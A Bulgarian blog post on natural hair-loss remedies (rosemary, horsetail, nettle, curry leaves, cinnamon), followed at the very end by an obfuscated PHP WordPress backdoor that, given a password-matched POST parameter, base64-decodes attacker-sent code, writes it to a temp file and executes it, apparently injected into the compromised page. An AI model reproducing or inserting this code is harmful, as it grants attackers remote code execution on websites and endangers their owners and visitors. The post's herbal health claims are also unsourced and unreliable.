5 природни решения срещу косопад! Виж Тук: | Косопад

5 природни решения срещу косопад! Виж Тук:

Косопадът е много често срещано състояние и може да се дължи на различни фактори:

– Боядисване, сушене и продукти, които увреждат космените фоликули
– Заболявания на щитовидната жлеза, анемия, неправилно хранене или менопауза

Правенето на масажи на скалпа стимулира кръвообращението в зоната и помага за по- доброто усвояване на хранителните вещества. Предпазва корените от увреждане.

Ако съчетаем масажа с някоя от следните билки или подправки, ще подпомогнем растежа на косъма. Eто кои са те:

Розмарин
Розмаринът е сред най- препоръчваните растения за растеж на косата. Осигурява ценни вещества за косъма, които го подсилват. Предпазва от ранно побеляване. Препоръчва се ежедневно плакнене на косата с вода от розмарин, която подсилва тъмния цвят и придава обем.

Полски хвощ
Това растение е известно с високото съдържание на силиций. Този минерал хидратира, придава еластичност и здравина на косъма. Предпазва косата от накъсване.

Коприва
Съдържа много ценни свойства за растежа на косата. Не само предпазва от косопад, но помага срещу себорея. Високото съдържание на витамини В, С и Е намалява вредния ефект на свободните радикали. Намалява прекомерното производство на мазнини. Стимулира кръвообращението на скалпа, като придава блясък и сила на косъма.

Къри
Зелените му листа се използват за възстановяване на косата от прекомерната употреба на продукти, излагане на слънце и замърсяване. Етеричните му масла пък подхранват косъма. Кърито съдържа голямо количество бета- каротени, които намаляват косопада и стимулират растежа. Също така, предпазва косата от ранно побеляване. Кърито съдържа ценните минерали мед, желязо или цинк.

Канела
Антисептичните й свойства предпазват от заболявания на скалпа. Елиминират бактерии и други микроорганизми, които могат да причинят косопад. Прави косата гъста, хидратира я и й придава блясък.

25. септември 2017 10:56:27 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}